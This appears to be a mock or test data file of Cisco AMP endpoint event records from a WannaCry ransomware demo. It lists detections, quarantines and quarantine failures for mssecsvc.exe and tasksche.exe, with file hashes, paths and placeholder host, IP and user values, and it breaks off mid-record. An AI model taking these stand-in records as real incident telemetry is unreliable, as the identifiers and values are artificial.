-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":33000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":891000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":876000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":845000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":798000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":767000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":751000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":735000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":96000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":33000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":111000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275394960064595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":862000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":659000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":831000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":706000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":643000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":721000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat 